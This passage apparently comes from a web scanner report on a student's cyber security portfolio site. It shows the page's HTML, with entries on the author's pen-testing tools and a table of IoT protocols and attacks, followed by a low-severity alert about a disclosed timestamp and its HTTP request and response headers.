          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
           <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
           <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
           <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
           </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
           <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          2000000000
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        7. GET https://beekmans.dev
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          254375293, which evaluates to: 1978-01-23 04:48:13

          Request
          Request line and header section (192 bytes)
          GET https://beekmans.dev HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1047 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:11 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4lOrbKK8y%2Bn8QLhKEGpB7rePrCHT1J%2BQaOZJP06h5%2BW2GkK9CRq%2Fdn7ChLzJzoJLiDaKfMYCpMPOGx7ddQ5eVNaVcohEeYRecx%2BV4c%2BapqYy04o6ANFaN3V3sF2rfmk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a31e5f8a4c13-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178340 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
